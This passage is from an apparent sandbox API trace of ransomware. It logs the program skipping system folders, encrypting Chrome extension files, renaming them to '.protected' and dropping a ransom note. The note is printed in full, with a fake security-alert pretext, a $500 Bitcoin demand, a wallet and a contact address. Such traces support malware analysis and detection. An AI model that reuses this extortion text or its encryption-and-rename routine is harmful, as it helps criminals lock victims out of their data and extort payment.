(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.814] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.814] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.815] CloseHandle (hObject=0x164) returned 1 [0078.815] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0078.815] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0078.815] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 141 [0078.815] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0078.815] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0078.815] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*") returned 143 [0078.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\.") returned 143 [0078.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.816] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\..") returned 144 [0078.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.816] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.816] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.816] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.816] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.816] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json") returned 155 [0078.816] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.816] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0078.817] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0078.817] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.817] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.818] CloseHandle (hObject=0x168) returned 1 [0078.818] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected") returned 165 [0078.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json.protected")) returned 1 [0078.818] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.818] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.818] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0078.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.818] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.818] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.819] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.819] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.819] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.819] CloseHandle (hObject=0x164) returned 1 [0078.819] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0078.819] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0078.819] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 141 [0078.819] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0078.820] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*") returned 143 [0078.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.820] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\.") returned 143 [0078.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\..") returned 144 [0078.820] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.820] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.820] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.820] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.820] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.820] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json") returned 155 [0078.821] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.821] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.821] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.821] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.821] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.821] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.822] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.822] CloseHandle (hObject=0x168) returned 1 [0078.822] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected") returned 165 [0078.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json.protected")) returned 1 [0078.822] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.822] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.822] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0078.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.823] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.823] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.823] lstrlenA 